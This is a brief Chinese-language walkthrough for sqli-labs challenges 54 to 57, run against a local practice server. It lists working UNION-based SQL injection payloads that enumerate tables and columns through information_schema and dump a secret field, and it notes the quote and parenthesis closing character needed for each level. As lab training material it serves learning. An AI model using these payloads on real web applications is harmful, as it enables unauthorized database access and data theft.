Less54,55,56,57【由库名逆向key】

思路：从给的库名推出表名，在推出列名，之后查看每列数据进行测试，找到key

表名

?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='CHALLENGES' --+

列名

group_concat(column_name) from information_schema.columns where table_name='7m7i6xs91c' --+

获取到列名"id,sessid,secret_4RFT,tryy"

之后查看每一列的数据，找到密码

 

错误：group_concat(id) from CHALLENGES.7m7i6xs91c--+

正确：group_concat(secret_4RFT) from CHALLENGES.7m7i6xs91c--+

 

Less55

Less55与54不同在于id参数闭合符号为 ( ) 

表名

http://127.0.0.1/sqli-labs-master/Less-55/?id=-1)%20union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27CHALLENGES%27--+

列名

group_concat(column_name) from information_schema.columns where table_name='4m9j52gi3z' --+

每列数据

group_concat(secret_1DAK) form CHALLENGES.4m9j52gi3z--+

 

56闭合符号为('')

57闭合符号为""